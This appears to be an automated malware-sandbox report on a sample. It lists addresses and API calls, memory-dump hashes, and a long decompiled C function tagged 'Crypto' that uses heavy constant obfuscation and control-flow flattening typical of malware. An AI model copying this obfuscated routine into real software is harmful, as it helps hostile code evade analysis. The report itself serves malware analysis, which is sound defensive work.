                          0x6e4ae6c5
                          0x6e4ae7a5
                          0x6e4ae7aa
                          0x6e4ae7ac
                          0x6e4ae7d0
                          0x00000000
                          0x6e4ae7ae
                          0x6e4ae7ae
                          0x6e4ae7b0
                          0x6e4ae7b2
                          0x6e4ae7ba
                          0x6e4ae7c3
                          0x6e4ae7c9
                          0x6e4ae7c9
                          0x00000000
                          0x6e4ae7ba
                          0x6e4ae6cb
                          0x6e4ae6cb
                          0x6e4ae6d0
                          0x6e4ae6d5
                          0x6e4ae6dc
                          0x6e4ae6f5
                          0x6e4ae6f5
                          0x6e4ae6fe
                          0x00000000
                          0x6e4ae704
                          0x6e4ae704
                          0x6e4ae70c
                          0x6e4ae729
                          0x6e4ae729
                          0x6e4ae72b
                          0x6e4ae731
                          0x6e4ae735
                          0x6e4ae757
                          0x6e4ae75b
                          0x6e4ae75d
                          0x6e4ae765
                          0x6e4ae787
                          0x6e4ae787
                          0x6e4ae791
                          0x6e4ae793
                          0x00000000
                          0x6e4ae767
                          0x6e4ae772
                          0x6e4ae77a
                          0x6e4ae83d
                          0x6e4ae840
                          0x6e4ae856
                          0x00000000
                          0x6e4ae780
                          0x6e4ae780
                          0x6e4ae782
                          0x00000000
                          0x6e4ae782
                          0x6e4ae77a
                          0x6e4ae737
                          0x6e4ae742
                          0x6e4ae74a
                          0x6e4ae81a
                          0x6e4ae81d
                          0x6e4ae833
                          0x00000000
                          0x6e4ae750
                          0x6e4ae750
                          0x6e4ae752
                          0x00000000
                          0x6e4ae752
                          0x6e4ae74a
                          0x6e4ae70e
                          0x6e4ae714
                          0x6e4ae71c
                          0x6e4ae7f7
                          0x6e4ae7fa
                          0x6e4ae810
                          0x6e4ae85e
                          0x6e4ae85e
                          0x6e4ae864
                          0x6e4ae873
                          0x6e4ae722
                          0x6e4ae722
                          0x6e4ae724
                          0x00000000
                          0x6e4ae724
                          0x6e4ae71c
                          0x6e4ae70c
                          0x6e4ae6de
                          0x6e4ae6e3
                          0x6e4ae6ea
                          0x6e4ae6ef
                          0x6e4ae7d8
                          0x6e4ae7dd
                          0x6e4ae7e2
                          0x6e4ae7e7
                          0x6e4ae7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae6ef
                          0x6e4ae6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6E4AE714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6E4AE742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6E4AE772
                          • GetCurrentProcess.KERNEL32 ref: 6E4AE787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE7C3
                            • Part of subcall function 6E4AE880: ReleaseMutex.KERNEL32(?,6E4AE5F8), ref: 6E4AE881
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: ac947e6aa8f1fea4d29174821f5974fdaca2396cc0fe8b553fac48da328a6352
                          • Instruction ID: 85535744fdb302dcbeec8bb69b4611428d70738d99b1fa6b4b1ee1ac0418df33
                          • Opcode Fuzzy Hash: ac947e6aa8f1fea4d29174821f5974fdaca2396cc0fe8b553fac48da328a6352
                          • Instruction Fuzzy Hash: E9417974E002409BDF00AFF9ECD4F6A37AAAB95B25F00053FE2169B384D77198418BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DEDED, Relevance: 25.7, Strings: 20, Instructions: 740COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E001DEDED(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				void* _t878;
				intOrPtr _t886;
				void* _t887;
				signed int _t889;
				void* _t899;
				void* _t904;
				void* _t912;
				void* _t916;
				void* _t917;
				void* _t925;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				void* _t948;
				intOrPtr _t949;
				char _t960;
				void* _t967;
				void* _t974;
				void* _t1020;
				void* _t1041;
				signed int _t1044;
				intOrPtr _t1045;
				void* _t1049;
				signed int* _t1051;
				signed int* _t1054;
				void* _t1056;

				_t1051 =  &_v432;
				_v284 = 0x691c9d;
				_v284 = _v284 * 0x5e;
				_t1049 = 0;
				_v284 = _v284 | 0xffb50446;
				_t925 = 0x7579ad8;
				_v284 = _v284 ^ 0xb2ffc1ad;
				_v120 = 0x60d75f;
				_v120 = _v120 << 8;
				_v120 = _v120 ^ 0x60d75f01;
				_v220 = 0xc69f70;
				_v220 = _v220 + 0xf28e;
				_v72 = __ecx;
				_t930 = 0xb;
				_v220 = _v220 / _t930;
				_v220 = _v220 ^ 0x0012248b;
				_v156 = 0x64e6c0;
				_v156 = _v156 + 0x49b8;
				_v156 = _v156 ^ 0x00653078;
				_v232 = 0x498fe5;
				_v232 = _v232 ^ 0x88a6dd1c;
				_v232 = _v232 + 0xfffff4d2;
				_v232 = _v232 ^ 0x88ef47cb;
				_v424 = 0xf724cb;
				_v424 = _v424 << 5;
				_v424 = _v424 >> 0xe;
				_t931 = 0x30;
				_v424 = _v424 * 0x7f;
				_v424 = _v424 ^ 0x003d4d6e;
				_v180 = 0x462264;
				_v180 = _v180 ^ 0x6fcea306;
				_v180 = _v180 ^ 0x6f888162;
				_v340 = 0x2e6d4e;
				_v340 = _v340 + 0x41e3;
				_v340 = _v340 + 0x5d4e;
				_v340 = _v340 ^ 0x6cf19d7b;
				_v340 = _v340 ^ 0x6cde9104;
				_v84 = 0xc70918;
				_v84 = _v84 * 0x44;
				_v84 = _v84 ^ 0x34de6a60;
				_v236 = 0x3b3b1b;
				_v236 = _v236 >> 0xe;
				_v236 = _v236 | 0x4836df35;
				_v236 = _v236 ^ 0x4836dffd;
				_v396 = 0xd569f3;
				_v396 = _v396 / _t931;
				_v396 = _v396 * 0x5b;
				_v396 = _v396 | 0x85f0bc17;
				_v396 = _v396 ^ 0x85f4bcd7;
				_v296 = 0x1e21a2;
				_v296 = _v296 * 0x31;
				_v296 = _v296 + 0x8ec0;
				_v296 = _v296 ^ 0x37f0404c;
				_v296 = _v296 ^ 0x3234be8e;
				_v176 = 0xdad679;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 ^ 0x0000034b;
				_v368 = 0x735672;
				_v368 = _v368 | 0x3953310b;
				_v368 = _v368 << 5;
				_v368 = _v368 + 0x74f2;
				_v368 = _v368 ^ 0x2e63acc9;
				_v376 = 0xd1bddc;
				_v376 = _v376 + 0xce36;
				_v376 = _v376 | 0xb461c001;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x0052086c;
				_v384 = 0xd19a5e;
				_t932 = 0x65;
				_v384 = _v384 / _t932;
				_v384 = _v384 | 0x726ef163;
				_v384 = _v384 + 0x9b53;
				_v384 = _v384 ^ 0x726dc7da;
				_v344 = 0xb29a03;
				_v344 = _v344 | 0x13511d04;
				_v344 = _v344 ^ 0x49acd7d1;
				_v344 = _v344 ^ 0xce5df15e;
				_v344 = _v344 ^ 0x9404b0e6;
				_v352 = 0x13b316;
				_v352 = _v352 | 0x6a2836e7;
				_v352 = _v352 + 0xffff0e65;
				_t933 = 0x3b;
				_v352 = _v352 / _t933;
				_v352 = _v352 ^ 0x01cb148f;
				_v360 = 0xcdb7f9;
				_t934 = 0x12;
				_v360 = _v360 / _t934;
				_v360 = _v360 + 0xd58f;
				_v360 = _v360 + 0xffff34a6;
				_v360 = _v360 ^ 0x000d394e;
				_v240 = 0x194d0a;
				_v240 = _v240 >> 5;
				_v240 = _v240 + 0xb037;
				_v240 = _v240 ^ 0x000181f4;
				_v336 = 0x90831a;
				_v336 = _v336 << 0xe;
				_v336 = _v336 | 0x73ebb7fd;
				_t1044 = 0x70;
				_v336 = _v336 * 0x28;
				_v336 = _v336 ^ 0x1d702c5c;
				_v164 = 0xd3cfdc;
				_v164 = _v164 + 0xf919;
				_v164 = _v164 ^ 0x00dcbb26;
				_v140 = 0xc70031;
				_v140 = _v140 / _t1044;
				_v140 = _v140 ^ 0x0002a430;
				_v224 = 0x4edd87;
				_v224 = _v224 << 9;
				_v224 = _v224 | 0xd4b44389;
				_v224 = _v224 ^ 0xddb78ea5;
				_v148 = 0x17582b;
				_v148 = _v148 << 3;
				_v148 = _v148 ^ 0x00bedc16;
				_v328 = 0xa02eea;
				_v328 = _v328 * 0x12;
				_v328 = _v328 + 0xffff4f3f;
				_v328 = _v328 * 0x72;
				_v328 = _v328 ^ 0x03a87b0f;
				_v312 = 0x65f311;
				_v312 = _v312 + 0xffffeb5b;
				_v312 = _v312 ^ 0x17ca191f;
				_v312 = _v312 << 1;
				_v312 = _v312 ^ 0x2f5e2391;
				_v216 = 0xcaaed7;
				_v216 = _v216 | 0xdfbffed2;
				_v216 = _v216 ^ 0xdff04099;
				_v320 = 0xe429a2;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x64d927e8;
				_v320 = _v320 >> 1;
				_v320 = _v320 ^ 0x0b6be30d;
				_v132 = 0xb8ca75;
				_v132 = _v132 | 0x13aee0cc;
				_v132 = _v132 ^ 0x13b0dc0a;
				_v364 = 0x6e0227;
				_v364 = _v364 | 0x4b6775d3;
				_v364 = _v364 + 0xffffa7b6;
				_v364 = _v364 | 0x5adace0b;
				_v364 = _v364 ^ 0x5bf85b33;
				_v332 = 0x1ea957;
				_v332 = _v332 ^ 0x7bdcea1f;
				_v332 = _v332 + 0xffff931b;
				_v332 = _v332 + 0xfe21;
				_v332 = _v332 ^ 0x7bce67a5;
				_v196 = 0x2eb620;
				_v196 = _v196 ^ 0x1a084885;
				_t935 = 0x1b;
				_v196 = _v196 / _t935;
				_v196 = _v196 ^ 0x00f7257a;
				_v432 = 0x3a3e0a;
				_v432 = _v432 ^ 0xc1716f80;
				_v432 = _v432 | 0x98ff88e4;
				_v432 = _v432 << 6;
				_v432 = _v432 ^ 0x7ff8035f;
				_v252 = 0xae10e8;
				_v252 = _v252 + 0xffff291c;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xd3ad17fd;
				_v136 = 0xd14910;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x000de50a;
				_v88 = 0xff11ba;
				_v88 = _v88 >> 0xe;
				_v88 = _v88 ^ 0x000cd76b;
				_v128 = 0xa92711;
				_v128 = _v128 ^ 0x556d13f3;
				_v128 = _v128 ^ 0x55c869df;
				_v96 = 0xd5b7ad;
				_v96 = _v96 | 0xc1cec025;
				_v96 = _v96 ^ 0xc1d1ee17;
				_v280 = 0x43f750;
				_v280 = _v280 + 0x2f6f;
				_v280 = _v280 | 0x22c29e26;
				_v280 = _v280 ^ 0x22c71f58;
				_v416 = 0x708958;
				_v416 = _v416 << 4;
				_t936 = 0x53;
				_v416 = _v416 * 0x55;
				_v416 = _v416 + 0x11ea;
				_v416 = _v416 ^ 0x55d2e849;
				_v288 = 0x2ccf8a;
				_v288 = _v288 ^ 0x2706f9e9;
				_v288 = _v288 >> 8;
				_v288 = _v288 ^ 0x002901bb;
				_v204 = 0x817792;
				_v204 = _v204 ^ 0xc81ce5e5;
				_v204 = _v204 >> 9;
				_v204 = _v204 ^ 0x00683104;
				_v292 = 0x369e72;
				_v292 = _v292 + 0xffff59c5;
				_v292 = _v292 + 0x9529;
				_v292 = _v292 ^ 0x0039ecd6;
				_v184 = 0x4cc20f;
				_v184 = _v184 >> 4;
				_v184 = _v184 ^ 0x000bd2f2;
				_v400 = 0x96d482;
				_v400 = _v400 / _t936;
				_v400 = _v400 ^ 0xfb214b85;
				_v400 = _v400 + 0xffff7dca;
				_v400 = _v400 ^ 0xfb2aaa3a;
				_v408 = 0xe3681d;
				_v408 = _v408 >> 2;
				_v408 = _v408 ^ 0x060a0f11;
				_v408 = _v408 + 0x10b8;
				_v408 = _v408 ^ 0x0636c909;
				_v272 = 0x590664;
				_v272 = _v272 >> 4;
				_v272 = _v272 + 0x26f3;
				_v272 = _v272 ^ 0x0003d4a2;
				_v172 = 0xf18346;
				_v172 = _v172 ^ 0x71ddc0cf;
				_v172 = _v172 ^ 0x7121affc;
				_v248 = 0xe1c8c4;
				_v248 = _v248 | 0xf2ad841b;
				_v248 = _v248 + 0xffff447a;
				_v248 = _v248 ^ 0xf2e9460c;
				_v256 = 0x519e10;
				_v256 = _v256 | 0xdc8a6104;
				_v256 = _v256 + 0x5077;
				_v256 = _v256 ^ 0xdcd61490;
				_v392 = 0x4daef6;
				_v392 = _v392 + 0x5b70;
				_v392 = _v392 | 0x7bfd6fbf;
				_v392 = _v392 ^ 0x7bfd4f8a;
				_v264 = 0xa63eff;
				_v264 = _v264 >> 8;
				_v264 = _v264 + 0xffffadc4;
				_v264 = _v264 ^ 0x000453cd;
				_v160 = 0x17d409;
				_v160 = _v160 ^ 0x9fb8b55e;
				_v160 = _v160 ^ 0x9fa0b21c;
				_v212 = 0x6a1a8d;
				_v212 = _v212 >> 3;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0x35094e45;
				_v112 = 0xa556a;
				_v112 = _v112 >> 5;
				_v112 = _v112 ^ 0x000cc68a;
				_v144 = 0xab50d0;
				_v144 = _v144 ^ 0xa6f75ca8;
				_v144 = _v144 ^ 0xa6598527;
				_v104 = 0xd81749;
				_v104 = _v104 + 0xffff8ca8;
				_v104 = _v104 ^ 0x00db48a0;
				_v268 = 0x33dbc3;
				_t937 = 0x76;
				_v268 = _v268 / _t937;
				_v268 = _v268 + 0xffff5dd8;
				_v268 = _v268 ^ 0xfff17317;
				_v152 = 0x42cbe3;
				_v152 = _v152 ^ 0xa4a52bdf;
				_v152 = _v152 ^ 0xa4e6915d;
				_v380 = 0x65d97d;
				_t938 = 0x21;
				_v380 = _v380 / _t938;
				_t939 = 0x5c;
				_v380 = _v380 / _t939;
				_v380 = _v380 >> 0x10;
				_v380 = _v380 ^ 0x0007411d;
				_v92 = 0xa9d4cf;
				_v92 = _v92 >> 2;
				_v92 = _v92 ^ 0x00290723;
				_v372 = 0xfeac8f;
				_v372 = _v372 + 0xffff000e;
				_v372 = _v372 | 0x784e09d1;
				_v372 = _v372 + 0x9e81;
				_v372 = _v372 ^ 0x790729d3;
				_v260 = 0xdb5b23;
				_v260 = _v260 ^ 0x99ef16de;
				_v260 = _v260 << 0xf;
				_v260 = _v260 ^ 0x26f8d6b6;
				_v316 = 0x9225c5;
				_t940 = 0x1d;
				_v316 = _v316 / _t940;
				_v316 = _v316 << 5;
				_v316 = _v316 << 6;
				_v316 = _v316 ^ 0x285c3ab4;
				_v228 = 0x4a87a9;
				_v228 = _v228 + 0x4174;
				_t941 = 0x15;
				_v228 = _v228 / _t941;
				_v228 = _v228 ^ 0x000ad4c3;
				_v200 = 0xe017a4;
				_v200 = _v200 | 0xfffd7bff;
				_v200 = _v200 ^ 0xfffcfad2;
				_v208 = 0x2755d6;
				_v208 = _v208 + 0xfffffacf;
				_v208 = _v208 | 0x40526ffd;
				_v208 = _v208 ^ 0x407e6bc8;
				_v116 = 0x3ae65f;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x00032ad5;
				_v124 = 0x5f3d3a;
				_t942 = 0x6b;
				_v124 = _v124 / _t942;
				_v124 = _v124 ^ 0x000bf430;
				_v100 = 0xf35212;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x0009c0a2;
				_v420 = 0x2eebab;
				_v420 = _v420 | 0xf6d0a7fd;
				_v420 = _v420 >> 1;
				_v420 = _v420 ^ 0x7b7d0167;
				_v300 = 0xce7509;
				_t943 = 0x69;
				_v300 = _v300 / _t943;
				_v300 = _v300 | 0x5075b092;
				_v300 = _v300 + 0x8361;
				_v300 = _v300 ^ 0x507a9538;
				_v348 = 0x191358;
				_t944 = 0xe;
				_v348 = _v348 * 0x1b;
				_v348 = _v348 | 0x0485a05c;
				_v348 = _v348 + 0xffff2600;
				_v348 = _v348 ^ 0x06a47f76;
				_v404 = 0x701fe6;
				_v404 = _v404 + 0x79e5;
				_v404 = _v404 * 0x58;
				_v404 = _v404 | 0xeb10b4f0;
				_v404 = _v404 ^ 0xefbedf20;
				_v324 = 0xb4b034;
				_v324 = _v324 + 0xffffd260;
				_v324 = _v324 / _t944;
				_v324 = _v324 + 0xffffaad8;
				_v324 = _v324 ^ 0x0006f697;
				_v412 = 0x7aa07a;
				_v412 = _v412 + 0xffffcfc6;
				_v412 = _v412 | 0x249cdff4;
				_v412 = _v412 << 7;
				_t1041 = 0xe1e175e;
				_v412 = _v412 ^ 0x7f772289;
				_v188 = 0x87f348;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x00047130;
				_v356 = 0x8a7190;
				_v356 = _v356 ^ 0x27d021b4;
				_t945 = 0x16;
				_v356 = _v356 / _t945;
				_v356 = _v356 + 0xffff1eb0;
				_v356 = _v356 ^ 0x01cefa44;
				_v388 = 0xbb3fb6;
				_v388 = _v388 + 0xffff20d9;
				_v388 = _v388 << 9;
				_t946 = 0x14;
				_push("true");
				_v388 = _v388 * 0x54;
				_v388 = _v388 ^ 0x4f556c94;
				_v308 = 0x1c0b60;
				_v308 = _v308 * 0x7b;
				_v308 = _v308 + 0xffff32c8;
				_v308 = _v308 + 0x24e1;
				_v308 = _v308 ^ 0x0d722f97;
				_v276 = 0x6570cb;
				_v276 = _v276 + 0xffff7c4e;
				_v276 = _v276 >> 0xc;
				_v276 = _v276 ^ 0x00020c1a;
				_v168 = 0x110360;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x0007d325;
				_v244 = 0x49b385;
				_v244 = _v244 / _t946;
				_v244 = _v244 / _t1044;
				_v244 = _v244 ^ 0x00088ad2;
				_v428 = 0xb594c6;
				_v428 = _v428 + 0xffffd599;
				_v428 = _v428 + 0x6abc;
				_pop(_t947);
				_v428 = _v428 / _t947;
				_v428 = _v428 ^ 0x000ab197;
				_v108 = 0xf33703;
				_v108 = _v108 ^ 0x76fb8a75;
				_v108 = _v108 ^ 0x760024cb;
				_v192 = 0x55d6d7;
				_v192 = _v192 >> 6;
				_v192 = _v192 | 0x1d096e60;
				_v192 = _v192 ^ 0x1d02387d;
				_v304 = 0xaa81cc;
				_v304 = _v304 * 0x1f;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff2ee4;
				_v304 = _v304 ^ 0x6dee6434;
				while(1) {
					L1:
					_t878 = 0xa919dff;
					_t1020 = 0x64ec131;
					_t948 = 0x5e7327f;
					do {
						while(1) {
							L2:
							_t1056 = _t925 - 0x7579ad8;
							if(_t1056 > 0) {
								break;
							}
							if(_t1056 == 0) {
								_t925 = 0xd75c4eb;
								continue;
							} else {
								if(_t925 == _t948) {
									_push(_v196);
									_push(_v332);
									_t886 = E001DCD35(0x1c1330, _v364, __eflags);
									_push(_v136);
									_t1045 = _t886;
									_push(_v252);
									_t887 = E001DCD35(0x1c12e0, _v432, __eflags);
									_v64 = _v220;
									_t889 = E001CB01D(_v88, _v128, _t1045, _v96);
									_t960 = 0x20;
									_v56 = _v56 & 0x00000000;
									_v68 = 2 + _t889 * 2;
									_v76 = _t960;
									_v48 =  &_v68;
									_v60 = _t1045;
									_v52 = 1;
									__eflags = E001E22FA(_v280,  &_v76,  &_v56, _t960, _v416, _t887, _v288, _v204, _v292, _v184, _v424,  &_v32, _v72) - _v180;
									_t925 =  ==  ? 0x64ec131 : 0xe1e175e;
									E001D629F(_v400, _t1045, _v408, _v272, _v172);
									E001D629F(_v248, _t887, _v256, _v392, _v264);
									_t1051 =  &(_t1051[0x17]);
									L15:
									_t1041 = 0xe1e175e;
									goto L26;
								} else {
									if(_t925 == _t1020) {
										_push(_v112);
										_push(_v212);
										_t899 = E001DCD35(0x1c1300, _v160, __eflags);
										_pop(_t967);
										__eflags = E001CEC68( *0x1e5220 + 0x4c,  &_v76, _v80, _v144, _t899, _v104, _v268, _t967, _v152, _v380, _v92, _v340) - _v84;
										_t925 =  ==  ? 0xa919dff : _t1041;
										E001D629F(_v372, _t899, _v260, _v316, _v228);
										_t1051 =  &(_t1051[0xd]);
										goto L26;
									} else {
										if(_t925 == 0x6b8fa15) {
											_push(_v300);
											_push(_v420);
											_t904 = E001DCD35(0x1c13b0, _v100, __eflags);
											_pop(_t974);
											_t1047 = _t904;
											_v44 = _v284;
											_v40 = _v120;
											_v36 = _v176;
											_t912 = E001DB4AE(_v348,  *((intOrPtr*)( *0x1e5220 + 0x4c)), _v404,  &_v44,  *((intOrPtr*)( *0x1e5220 + 0x48)), _v80, _v324,  *0x1e5220 + 0x44, _v412, _v188, _t904, _v356, _t974, 0x1c13b0, _v236);
											_t1054 =  &(_t1051[0xd]);
											__eflags = _t912 - _v396;
											if(_t912 != _v396) {
												_t925 = 0x7142ff7;
											} else {
												_t925 = _t1041;
												_t1049 = 1;
											}
											E001D629F(_v388, _t1047, _v308, _v276, _v168);
											_t1051 =  &(_t1054[3]);
											L26:
											_t878 = 0xa919dff;
											_t948 = 0x5e7327f;
											_t1020 = 0x64ec131;
											goto L27;
										} else {
											if(_t925 != 0x7142ff7) {
												goto L27;
											} else {
												E001CAE43( *((intOrPtr*)( *0x1e5220 + 0x48)), _v244, _v428);
												_t925 = _t1041;
												while(1) {
													L1:
													_t878 = 0xa919dff;
													_t1020 = 0x64ec131;
													_t948 = 0x5e7327f;
													goto L2;
												}
											}
										}
									}
								}
							}
							L21:
							return _t1049;
						}
						__eflags = _t925 - _t878;
						if(_t925 == _t878) {
							_push(_t948);
							_push(_t948);
							_t949 = E001D5212( *((intOrPtr*)( *0x1e5220 + 0x4c)));
							_t1051 =  &(_t1051[3]);
							 *((intOrPtr*)( *0x1e5220 + 0x48)) = _t949;
							__eflags = _t949;
							if(__eflags == 0) {
								_t925 = _t1041;
								goto L26;
							} else {
								_t925 = 0x6b8fa15;
								goto L1;
							}
						} else {
							__eflags = _t925 - 0xd75c4eb;
							if(__eflags == 0) {
								_push(_v384);
								_push(_v376);
								_t916 = E001DCD35(0x1c1290, _v368, __eflags);
								_push(_v360);
								_push(_v352);
								_t917 = E001DCD35(0x1c1250, _v344, __eflags);
								_t807 =  &_v336; // 0x6dee6434
								__eflags = E001DD96C(_v240,  *_t807,  &_v80, _v156, _v164, _t917, _t916) - _v232;
								_t925 =  ==  ? 0x5e7327f : 0xce84384;
								E001D629F(_v140, _t916, _v224, _v148, _v328);
								E001D629F(_v312, _t917, _v216, _v320, _v132);
								_t1051 =  &(_t1051[0xf]);
								goto L15;
							} else {
								__eflags = _t925 - _t1041;
								if(_t925 != _t1041) {
									goto L27;
								} else {
									_t793 =  &_v304; // 0x6dee6434
									E001D4827(_v80, _v108, _v296, _v192,  *_t793);
								}
							}
						}
						goto L21;
						L27:
						__eflags = _t925 - 0xce84384;
					} while (__eflags != 0);
					goto L21;
				}
			}

















































































































































                          0x001deded
                          0x001dedf3
                          0x001dee0c
                          0x001dee13
                          0x001dee15
                          0x001dee20
                          0x001dee25
                          0x001dee30
                          0x001dee3b
                          0x001dee43
                          0x001dee4e
                          0x001dee59
                          0x001dee6d
                          0x001dee74
                          0x001dee79
                          0x001dee82
                          0x001dee8d
                          0x001dee98
                          0x001deea3
                          0x001deeae
                          0x001deeb9
                          0x001deec4
                          0x001deecf
                          0x001deeda
                          0x001deee2
                          0x001deee7
                          0x001deef1
                          0x001deef2
                          0x001deef6
                          0x001deefe
                          0x001def09
                          0x001def14
                          0x001def1f
                          0x001def27
                          0x001def2f
                          0x001def37
                          0x001def3f
                          0x001def47
                          0x001def5a
                          0x001def61
                          0x001def6c
                          0x001def77
                          0x001def7f
                          0x001def8a
                          0x001def95
                          0x001defa3
                          0x001defac
                          0x001defb0
                          0x001defb8
                          0x001defc0
                          0x001defd3
                          0x001defda
                          0x001defe5
                          0x001deff0
                          0x001deffb
                          0x001df006
                          0x001df00e
                          0x001df019
                          0x001df021
                          0x001df029
                          0x001df02e
                          0x001df036
                          0x001df03e
                          0x001df046
                          0x001df04e
                          0x001df056
                          0x001df05d
                          0x001df065
                          0x001df073
                          0x001df078
                          0x001df07e
                          0x001df086
                          0x001df08e
                          0x001df096
                          0x001df09e
                          0x001df0a6
                          0x001df0ae
                          0x001df0b6
                          0x001df0be
                          0x001df0c6
                          0x001df0ce
                          0x001df0da
                          0x001df0df
                          0x001df0e5
                          0x001df0ed
                          0x001df0f9
                          0x001df0fe
                          0x001df104
                          0x001df10c
                          0x001df114
                          0x001df11c
                          0x001df127
                          0x001df12f
                          0x001df13a
                          0x001df145
                          0x001df14d
                          0x001df152
                          0x001df15f
                          0x001df160
                          0x001df164
                          0x001df16c
                          0x001df177
                          0x001df182
                          0x001df18d
                          0x001df1a1
                          0x001df1a8
                          0x001df1b3
                          0x001df1be
                          0x001df1c6
                          0x001df1d1
                          0x001df1dc
                          0x001df1e7
                          0x001df1ef
                          0x001df1fa
                          0x001df207
                          0x001df20b
                          0x001df218
                          0x001df21c
                          0x001df224
                          0x001df22f
                          0x001df23a
                          0x001df245
                          0x001df24c
                          0x001df257
                          0x001df262
                          0x001df26d
                          0x001df278
                          0x001df283
                          0x001df28d
                          0x001df298
                          0x001df29f
                          0x001df2aa
                          0x001df2b5
                          0x001df2c0
                          0x001df2cb
                          0x001df2d3
                          0x001df2db
                          0x001df2e3
                          0x001df2eb
                          0x001df2f3
                          0x001df2fb
                          0x001df303
                          0x001df30b
                          0x001df313
                          0x001df31b
                          0x001df326
                          0x001df33a
                          0x001df33f
                          0x001df348
                          0x001df353
                          0x001df35b
                          0x001df363
                          0x001df36b
                          0x001df370
                          0x001df378
                          0x001df383
                          0x001df38e
                          0x001df396
                          0x001df3a1
                          0x001df3ac
                          0x001df3b4
                          0x001df3bf
                          0x001df3ca
                          0x001df3d2
                          0x001df3dd
                          0x001df3e8
                          0x001df3f3
                          0x001df3fe
                          0x001df409
                          0x001df414
                          0x001df41f
                          0x001df42a
                          0x001df435
                          0x001df440
                          0x001df44b
                          0x001df453
                          0x001df45d
                          0x001df45e
                          0x001df462
                          0x001df46a
                          0x001df472
                          0x001df47d
                          0x001df488
                          0x001df490
                          0x001df49b
                          0x001df4a6
                          0x001df4b1
                          0x001df4b9
                          0x001df4c4
                          0x001df4cf
                          0x001df4da
                          0x001df4e5
                          0x001df4f0
                          0x001df4fb
                          0x001df503
                          0x001df50e
                          0x001df51c
                          0x001df520
                          0x001df528
                          0x001df530
                          0x001df53a
                          0x001df542
                          0x001df547
                          0x001df54f
                          0x001df557
                          0x001df55f
                          0x001df56a
                          0x001df572
                          0x001df57d
                          0x001df588
                          0x001df593
                          0x001df59e
                          0x001df5a9
                          0x001df5b4
                          0x001df5bf
                          0x001df5ca
                          0x001df5d5
